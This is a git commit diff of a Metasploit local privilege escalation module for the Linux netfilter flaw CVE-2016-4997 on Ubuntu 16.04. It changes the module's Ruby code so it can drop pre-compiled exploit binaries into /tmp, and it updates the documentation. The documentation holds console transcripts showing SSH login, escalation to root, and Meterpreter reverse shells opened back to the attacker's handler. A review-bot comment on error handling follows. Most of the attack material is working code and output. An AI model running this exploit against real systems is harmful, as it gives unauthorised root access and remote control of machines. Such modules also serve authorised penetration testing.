binary drops work!
parent
3dff41c833
commit
23e5556a4c
Binary file not shown.
Binary file not shown.
|
@ -9,15 +9,14 @@ This module (and the original exploit) are written in two parts: desc, and pwn.
|
|||
There are a few requirements for this module to work (ubuntu):
|
||||
|
||||
1. ip_tables.ko has to be loaded (root running iptables -L will do such)
|
||||
2. libc6-dev-i386 needs to be installed to compile
|
||||
3. shem and sham can not be installed/running
|
||||
2. shem and sham can not be installed/running
|
||||
|
||||
This module has been tested against:
|
||||
|
||||
1. Ubuntu 16.04.1 (sudo apt-get install linux-image-4.4.0-21-generic)
|
||||
2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic
|
||||
|
||||
This does not work against the following vulnerable systems. Additional work may be required.
|
||||
This does not work against the following vulnerable systems. Additional work may be required to the binary and C code to enable these targets.
|
||||
|
||||
1. Fedora 24 < [kernel-4.6.3-300](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c18)
|
||||
2. Fedora 22 < [kernel-4.4.14-200](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c19)
|
||||
|
@ -28,7 +27,7 @@ This does not work against the following vulnerable systems. Additional work ma
|
|||
|
||||
1. Start msfconsole
|
||||
2. Exploit a box via whatever method
|
||||
4. Do: `use exploit/linux/local/ubuntu_netfilter`
|
||||
4. Do: `use exploit/linux/local/netfilter_priv_esc`
|
||||
5. Do: `set session #`
|
||||
6. Do: `set verbose true`
|
||||
7. Do: `exploit`
|
||||
|
@ -51,7 +50,7 @@ This does not work against the following vulnerable systems. Additional work ma
|
|||
|
||||
### Ubuntu 16.04.1 (with linux-image-4.4.0-21-generic)
|
||||
|
||||
Initial Access
|
||||
#### Initial Access
|
||||
|
||||
msf > use auxiliary/scanner/ssh/ssh_login
|
||||
msf auxiliary(ssh_login) > set rhosts 127.0.0.1
|
||||
|
@ -69,68 +68,151 @@ Initial Access
|
|||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
Escalate
|
||||
#### Escalate
|
||||
|
||||
msf auxiliary(ssh_login) > use exploit/linux/local/ubuntu_netfilter
|
||||
msf exploit(ubuntu_netfilter) > set session 1
|
||||
session => 1
|
||||
msf exploit(ubuntu_netfilter) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(ubuntu_netfilter) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.20.14.188:4444
|
||||
[*] Checking if libc6-dev-i386 is installed
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
|
||||
[+] libc6-dev-i386 is installed
|
||||
[*] Checking if ip_tables.ko is loaded
|
||||
[+] gcc-multilib is installed
|
||||
[+] gcc is installed
|
||||
[*] Live compiling exploit on system
|
||||
[*] Checking if ip_tables is loaded in kernel
|
||||
[+] ip_tables.ko is loaded
|
||||
[*] Checking if shem or sham are installed
|
||||
[+] shem and sham not present.
|
||||
[*] Writing desc executable to /tmp/452xNomE.c
|
||||
[*] Writing desc executable to /tmp/fI1xW1Js.c
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 3484 bytes in 1 chunks of 12068 bytes (octal-encoded), using printf
|
||||
[*] Executing /tmp/452xNomE, may take around 35s to finish. Watching for /tmp/rrOA1xsB to be created.
|
||||
[*] Writing 3291 bytes in 1 chunks of 11490 bytes (octal-encoded), using printf
|
||||
[*] Executing /tmp/fI1xW1Js, may take around 35s to finish. Watching for /tmp/GWqpwKnG to be created.
|
||||
[*] Waited 0s so far
|
||||
[*] Waited 10s so far
|
||||
[*] Waited 20s so far
|
||||
[*] Waited 30s so far
|
||||
[+] desc finished, env ready.
|
||||
[*] Writing payload to /tmp/HbFVMTZM
|
||||
[*] Writing payload to /tmp/Thzyfenv
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
|
||||
[*] Writing pwn executable to /tmp/eRFqvuyG.c
|
||||
[*] Writing pwn executable to /tmp/wmfFiQKu.c
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 1418 bytes in 1 chunks of 4975 bytes (octal-encoded), using printf
|
||||
[*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
|
||||
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
|
||||
[*] Sending stage (1495599 bytes) to 172.20.14.188
|
||||
[*] Meterpreter session 2 opened (172.20.14.188:4444 -> 172.20.14.188:45114) at 2016-09-16 01:16:52 -0400
|
||||
[*] Sending stage (1495599 bytes) to 192.168.2.137
|
||||
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60982) at 2016-09-24 17:22:47 -0400
|
||||
[+] Deleted /tmp/fI1xW1Js.c
|
||||
[+] Deleted /tmp/GWqpwKnG
|
||||
[+] Deleted /tmp/fI1xW1Js
|
||||
[+] Deleted /tmp/Thzyfenv
|
||||
[+] Deleted /tmp/wmfFiQKu.c
|
||||
[+] Deleted /tmp/wmfFiQKu
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : ubuntu
|
||||
OS : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
|
||||
Architecture : x86_64
|
||||
Meterpreter : x86/linux
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
|
||||
|
||||
### Re-exploit
|
||||
#### Escalate w/ pre-compiled binaries
|
||||
|
||||
In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again.
|
||||
|
||||
msf exploit(ubuntu_netfilter) > set reexploit true
|
||||
reexploit => true
|
||||
msf exploit(ubuntu_netfilter) > set session 2
|
||||
session => 2
|
||||
msf exploit(ubuntu_netfilter) > exploit
|
||||
msf exploit(netfilter_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.20.14.188:4445
|
||||
[*] Checking if libc6-dev-i386 is installed
|
||||
[+] libc6-dev-i386 is installed
|
||||
[*] Checking if ip_tables.ko is loaded
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
|
||||
[-] libc6-dev-i386 is not installed. Compiling will fail.
|
||||
[-] gcc-multilib is not installed. Compiling will fail.
|
||||
[-] gcc is not installed. Compiling will fail.
|
||||
[*] Dropping pre-compiled exploit on system
|
||||
[*] Checking if ip_tables is loaded in kernel
|
||||
[+] ip_tables.ko is loaded
|
||||
[*] Checking if shem or sham are installed
|
||||
[+] shem and sham not present.
|
||||
[*] Writing payload to /tmp/OblBUbtc
|
||||
[*] Writing pwn executable to /tmp/u4PnMEdw.c
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 7820 bytes in 1 chunks of 21701 bytes (octal-encoded), using printf
|
||||
[*] Executing /tmp/8lQZGJdL, may take around 35s to finish. Watching for /tmp/okDjTFSS to be created.
|
||||
[*] Waited 0s so far
|
||||
[*] Waited 10s so far
|
||||
[*] Waited 20s so far
|
||||
[*] Waited 30s so far
|
||||
[+] desc finished, env ready.
|
||||
[*] Writing payload to /tmp/2016_4997_payload
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
|
||||
[*] Writing pwn executable to /tmp/nOO6sYqi
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
|
||||
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
|
||||
[*] Sending stage (1495599 bytes) to 172.20.14.188
|
||||
[*] Meterpreter session 3 opened (172.20.14.188:4445 -> 172.20.14.188:40370) at 2016-09-17 13:35:57 -0400
|
||||
[+] Deleted /tmp/OblBUbtc
|
||||
[+] Deleted /tmp/u4PnMEdw.c
|
||||
[+] Deleted /tmp/u4PnMEdw
|
||||
[-] Exploit failed: Rex::TimeoutError Operation timed out.
|
||||
[*] Exploit completed, but no session was created.
|
||||
[*] Sending stage (1495599 bytes) to 192.168.2.137
|
||||
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:46778) at 2016-09-24 21:24:22 -0400
|
||||
[+] Deleted /tmp/okDjTFSS
|
||||
[+] Deleted /tmp/2016_4997_payload
|
||||
[+] Deleted /tmp/nOO6sYqi
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : ubuntu
|
||||
OS : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
|
||||
Architecture : x86_64
|
||||
Meterpreter : x86/linux
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
|
||||
|
||||
#### Re-exploit
|
||||
|
||||
In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again.
|
||||
|
||||
msf exploit(netfilter_priv_esc) > set reexploit true
|
||||
reexploit => true
|
||||
msf exploit(netfilter_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
|
||||
[+] libc6-dev-i386 is installed
|
||||
[+] gcc-multilib is installed
|
||||
[+] gcc is installed
|
||||
[*] Live compiling exploit on system
|
||||
[*] Checking if ip_tables is loaded in kernel
|
||||
[+] ip_tables.ko is loaded
|
||||
[*] Checking if shem or sham are installed
|
||||
[+] shem and sham not present.
|
||||
[*] Writing payload to /tmp/egMfQrrI
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
|
||||
[*] Writing pwn executable to /tmp/Yf8CAdMu.c
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
|
||||
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
|
||||
[*] Sending stage (1495599 bytes) to 192.168.2.137
|
||||
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60984) at 2016-09-24 17:29:06 -0400
|
||||
[+] Deleted /tmp/egMfQrrI
|
||||
[+] Deleted /tmp/Yf8CAdMu.c
|
||||
[+] Deleted /tmp/Yf8CAdMu
|
||||
|
||||
meterpreter >
|
||||
|
||||
#### Re-exploit w/ pre-compiled binaries
|
||||
|
||||
msf exploit(netfilter_priv_esc) > set reexploit true
|
||||
reexploit => true
|
||||
msf exploit(netfilter_priv_esc) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||||
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
|
||||
[+] libc6-dev-i386 is installed
|
||||
[-] gcc-multilib is not installed. Compiling will fail.
|
||||
[-] gcc is not installed. Compiling will fail.
|
||||
[*] Dropping pre-compiled exploit on system
|
||||
[*] Checking if ip_tables is loaded in kernel
|
||||
[+] ip_tables.ko is loaded
|
||||
[*] Checking if shem or sham are installed
|
||||
[+] shem and sham not present.
|
||||
[*] Writing payload to /tmp/2016_4997_payload
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
|
||||
[*] Writing pwn executable to /tmp/SZrv2NOR
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
|
||||
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
|
||||
[*] Sending stage (1495599 bytes) to 192.168.2.137
|
||||
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60996) at 2016-09-24 20:47:03 -0400
|
||||
|
||||
meterpreter >
|
||||
|
|
|
@ -344,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/,
|
||||
"execl(\"#{payload_path}\", NULL);")
|
||||
|
||||
def pwn(payload_path, pwn_file, pwn)
|
||||
def pwn(payload_path, pwn_file, pwn, compile)
|
||||
# lets write our payload since everythings set for priv esc
|
||||
vprint_status("Writing payload to #{payload_path}")
|
||||
write_file(payload_path, generate_payload_exe)
|
||||
|
@ -352,43 +352,55 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
register_file_for_cleanup(payload_path)
|
||||
|
||||
# now lets drop part 2, and finish up.
|
||||
print_status "Writing pwn executable to #{pwn_file}.c"
|
||||
rm_f pwn_file
|
||||
rm_f "#{pwn_file}.c"
|
||||
write_file("#{pwn_file}.c", pwn)
|
||||
cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")
|
||||
register_file_for_cleanup("#{pwn_file}.c")
|
||||
if compile
|
||||
print_status "Writing pwn executable to #{pwn_file}.c"
|
||||
rm_f "#{pwn_file}.c"
|
||||
write_file("#{pwn_file}.c", pwn)
|
||||
cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")
|
||||
register_file_for_cleanup("#{pwn_file}.c")
|
||||
else
|
||||
print_status "Writing pwn executable to #{pwn_file}"
|
||||
write_file(pwn_file, pwn)
|
||||
end
|
||||
register_file_for_cleanup(pwn_file)
|
||||
cmd_exec("chmod +x #{pwn_file}; #{pwn_file}")
|
||||
end
|
||||
|
||||
if not compile # we need to override with our pre-created binary
|
||||
# pwn file
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-2')
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')
|
||||
fd = ::File.open( path, "rb")
|
||||
pwn = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
# desc file
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-1')
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')
|
||||
fd = ::File.open( path, "rb")
|
||||
decr = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
|
||||
# overwrite the hardcoded variable names in the compiled versions
|
||||
env_ready_file = '/tmp/okDjTFSS'
|
||||
payload_path = '/tmp/2016_4997_payload'
|
||||
end
|
||||
|
||||
# check for shortcut
|
||||
if datastore['REEXPLOIT']
|
||||
pwn(payload_path, pwn_file, pwn)
|
||||
pwn(payload_path, pwn_file, pwn, compile)
|
||||
else
|
||||
print_status "Writing desc executable to #{desc_file}.c"
|
||||
rm_f env_ready_file
|
||||
rm_f "#{desc_file}.c"
|
||||
rm_f desc_file
|
||||
write_file("#{desc_file}.c", decr)
|
||||
output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
|
||||
|
||||
if compile
|
||||
print_status "Writing desc executable to #{desc_file}.c"
|
||||
rm_f "#{desc_file}.c"
|
||||
write_file("#{desc_file}.c", decr)
|
||||
register_file_for_cleanup("#{desc_file}.c")
|
||||
output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
|
||||
else
|
||||
write_file(desc_file, decr)
|
||||
end
|
||||
rm_f env_ready_file
|
||||
register_file_for_cleanup(env_ready_file)
|
||||
register_file_for_cleanup("#{desc_file}.c")
|
||||
register_file_for_cleanup(desc_file)
|
||||
#register_file_for_cleanup(desc_file)
|
||||
if not file_exist?(desc_file)
|
||||
vprint_error("gcc failure output: #{output}")
|
||||
fail_with(Failure::Unknown, "#{desc_file}.c failed to compile")
|
||||
|
@ -409,7 +421,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
if file_exist?(env_ready_file)
|
||||
print_good("desc finished, env ready.")
|
||||
pwn(payload_path, pwn_file, pwn)
|
||||
pwn(payload_path, pwn_file, pwn, compile)
|
||||
return
|
||||
end
|
||||
sec_waited +=1
|
||||
|
|
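Review bot: The failure check `if not file_exist?(desc_file)` after the new `if compile … else … end` block still reports a compile error in both branches: when `compile` is false, `output` is never assigned, so `vprint_error("gcc failure output: #{output}")` prints nothing useful and `fail_with` blames `#{desc_file}.c`, a file that path never writes. Make the message follow the branch, e.g. `fail_with(Failure::Unknown, compile ? "#{desc_file}.c failed to compile" : "#{desc_file} failed to write")`, and wrap the gcc-output line in `if compile`. Two smaller points in the same hunk: the pre-compiled branch of `pwn` appears to write `pwn_file` without the `rm_f pwn_file` the old code ran first, and the `if not compile` block fixes `payload_path` to `/tmp/2016_4997_payload` with no `rm_f` before its `write_file`, so a leftover file from an earlier run (possibly owned by another user) may make the write fail — an `rm_f` before each write, as the compile branch already does for the `.c`, would keep both paths consistent. The `::File.open`/`read`/`close` pairs can be `::File.binread(path)`, which also closes the handle when `read` raises, and `if not compile` reads better as `unless compile`. The enclosing exploit method starts and ends outside the hunk.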